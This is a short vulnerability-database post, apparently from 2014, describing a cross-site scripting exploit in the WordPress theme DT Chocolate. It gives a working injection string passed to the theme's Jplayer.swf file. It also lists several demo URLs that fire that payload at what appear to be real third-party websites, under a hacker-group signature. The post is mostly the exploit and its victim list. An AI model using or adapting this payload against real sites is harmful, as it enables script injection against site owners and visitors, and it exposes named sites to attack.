WordPress DT Chocolate跨站脚本漏洞

日期: 2014/02/03 | 标签:wordpress | 游览：259

Exploit:
Wordpress Theme DT Chocolate suffers from an xss vulnerability.
+P.O.C:
127.0.0.1/[PATH]/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/TUNISIAN CYBER/)//

Demo:
http://www.impala-miami.com/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//
http://reportagesphotos-kaddouchmagali.fr/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//
http://www.laluzdeunangel.com/nuevo/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//
http://orianneboulage.fr/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!ale

← Joomla Zap Weather FPD & Zap Calendar跨站脚本漏洞

FreeBSD bsnmpd ‘GETBULK PDU’请求远程栈缓冲区溢出漏洞 →

ZeroBox Vulnerability Database

坚持！我们将做的更好！

WordPress DT Chocolate跨站脚本漏洞

评论关闭。